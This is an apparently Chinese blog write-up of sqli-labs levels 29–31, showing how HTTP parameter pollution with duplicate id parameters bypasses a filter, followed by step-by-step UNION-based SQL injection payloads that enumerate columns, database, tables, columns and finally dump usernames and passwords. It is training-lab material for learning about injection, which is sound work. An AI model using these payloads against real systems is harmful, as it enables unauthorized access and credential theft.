当前位置: 首页 > news >正文

sqli_labs第二十九/三十/三十一关——hpp注入

一:HTTP参数污染:

hpp(http parameter pollution)注入中,可以通过在hppt的请求中注入多个同名参数来绕过安全过滤

原理:php默认只取最后一个同名参数 

比如在这一关里,可能对第一个id参数进行消毒处理,但php实际执行的时候使用了第二个没被消毒的id参数

二:判断闭合方式

输入?id=1和?id=1'的时候产生报错

用两个参数进行单引号闭合 ,闭合成功

 三:开始攻击

1.判断列数:

?id=1&id=1' order by 1,2,3,4--+

 三列

2.爆回显位:

?id=1&id=-1' union select 1,2,3--+

3.爆数据库名,版本号

?id=1&id=-1' union select 1,database(),version()--+

4.爆表名,行数

?id=1&id=-1' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

 5.爆列名:

?id=1&id=-1' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

 6.爆数据

?id=1&id=-1' union select 1,group_concat(username,':',password),3 from users--+

ps1:

在查看源码和尝试注入的过程中,发现本关waf的拦截好像并没有起作用,题目存在误导性,用布尔检测和盲注应该也能正常做

ps2:

第三十关把闭合方式改成了双引号 ” ,第三十一关把闭合方式改成了双引号括号 “),其余全部相同 

❀❀❀ 完结撒花!!!❀❀❀ 

相关文章:

  • 【手写数据库核心揭秘系列】第9节 可重入的SQL解析器,不断解析Structure Query Language,语言翻译好帮手
  • [STM32学习笔记(九)]CubeMX项目使用系统定时器SysTick的中断服务函数进行定时
  • 《计算机组成原理》第 1 章 - 计算机系统概论
  • DAY38打卡
  • Python PyMySQL
  • 嵌入式开发学习日志(linux系统编程--进程(3)——线程)Day29
  • Ubuntu20.04系统安装,使用系统盘安装
  • AD-PCB--电子设计学习思路 DAY 1
  • 通过HIVE SQL获取每个用户的最大连续登录时常
  • 0527漏洞原理:SQL注入笔记 SQL注入类型(联合查询注入、报错注入实操)
  • SQL Server 简介和与其它数据库对比
  • sqli-第三十二关——bypass addslashes
  • 一对多 多对一
  • SQL思路解析:窗口函数该如何使用?
  • LeetCode 高频 SQL 50 题(基础版)之 【连接】部分 · 上
  • 猿大师办公助手WebOffice用二进制数据流在Web前端打开Office文档
  • 二次封装 Vuex for Uniapp 微信小程序开发
  • npm error Cannot find module ‘negotiator‘ 的处理
  • Turf.js:前端地理空间分析的瑞士军刀
  • 网络编程3
  • 网站流量好难做/百度推广业务员电话
  • 备案 非网站/在线代理浏览网址
  • 优酷网站谁做的/怎么在百度上发布自己的信息
  • 做网站绿标/今日新闻快讯
  • 做网站找投资人/网站关键词优化教程
  • 做网站一般长宽多少/宁波seo网络推广外包报价